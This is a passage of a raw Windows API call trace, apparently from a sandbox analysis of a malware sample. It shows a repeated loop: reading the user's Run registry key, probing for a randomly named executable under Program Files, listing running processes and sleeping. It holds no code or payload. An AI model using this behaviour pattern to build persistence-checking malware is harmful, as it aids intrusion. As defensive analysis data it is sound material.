KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0257.071] NtClose (Handle=0x270) returned 0x0 [0257.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0257.072] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0257.079] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731f78) returned 1 [0257.079] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0257.079] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0257.080] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7320c8) returned 1 [0257.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0257.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0257.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0257.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0257.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0257.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.483] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0257.534] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0257.536] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0257.537] NtClose (Handle=0x270) returned 0x0 [0257.537] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0257.537] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0257.537] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731aa8) returned 1 [0257.537] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0257.537] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0257.537] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731b88) returned 1 [0257.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0257.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0257.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0257.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0257.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0258.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.071] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0258.080] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0258.081] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0258.081] NtClose (Handle=0x270) returned 0x0 [0258.081] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.082] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.082] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731e28) returned 1 [0258.082] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.082] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.082] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731aa8) returned 1 [0258.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0258.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0258.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0258.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0258.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0258.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.244] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0258.254] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0258.256] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0258.256] NtClose (Handle=0x270) returned 0x0 [0258.256] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.256] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.256] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731db8) returned 1 [0258.256] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.256] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.256] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731e28) returned 1 [0258.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0258.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0258.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0258.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0258.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0258.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.688] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0258.773] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0258.775] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0258.775] NtClose (Handle=0x270) returned 0x0 [0258.775] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.775] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.775] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731f78) returned 1 [0258.776] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.776] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.776] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731cd8) returned 1 [0258.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0258.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0258.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0258.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0258.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0259.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.074] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0259.083] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0259.085] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0259.085] NtClose (Handle=0x270) returned 0x0 [0259.085] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.085] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.087] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731db8) returned 1 [0259.087] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.087] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.087] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7319c8) returned 1 [0259.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0259.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0259.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0259.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0259.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0259.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.257] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0259.328] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0259.329] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0259.329] NtClose (Handle=0x270) returned 0x0 [0259.329] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.329] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.329] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731f08) returned 1 [0259.330] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.330] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.330] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7320c8) returned 1 [0259.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0259.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 